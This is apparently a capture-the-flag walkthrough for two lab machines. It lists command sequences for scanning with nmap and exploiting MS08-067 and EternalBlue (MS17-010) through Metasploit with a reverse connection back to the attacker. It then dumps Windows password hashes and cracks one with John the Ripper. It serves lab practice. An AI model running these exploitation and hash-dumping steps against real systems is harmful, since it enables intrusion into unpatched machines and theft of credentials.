Mastering EternalBlue MS17-010 & MS08-067: A Hands-On, Step-by-Step Walkthrough to Exploiting Legacy Windows Vulnerabilities

MS08-067

nmap -p0- -Pn -sC -sV --min-rate 2000 --max-retries 8 -iL legacy.htb --stats-every 60 --reason -oN all-port-nmap-output.txt

nmap -p 135,139,445 -Pn -O -sV -sC --script vuln --min-rate 2000 -iL legacy.htb --stats-every 60 -oN detailed-nmap-output.txt
msfconsole
search ms08-067
use 0
options
set RHOSTS <ip>
set LHOST tun0
run (or exploit)
pwd
cd ../../
pwd
dir
cd "Documents and Settings"
dir 
cd Administrator 
cd Desktop
dir
cat root.txt

EternalBlue MS17-010

nmap -p0- -Pn -sC -sV --min-rate 2000 --max-retries 8 -iL blue.thm --stats-every 60 --reason -oN all-port-nmap-output.txt

nmap -p 135,139,445 -Pn -O -sV -sC --script vuln --min-rate 2000 -iL blue.thm --stats-every 60 -oN detailed-nmap-output.txt
msfconsole
search ms17-010
use 0
options
set RHOSTS <ip>
set LHOST tun0
run
getuid
shell
Press CTRL + Z and type y to background the shell
hashdump
Copy and paste jon's hash into a text editor and save it as hash.txt
john --format=NT --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
pwd
dir
cat flag1.txt
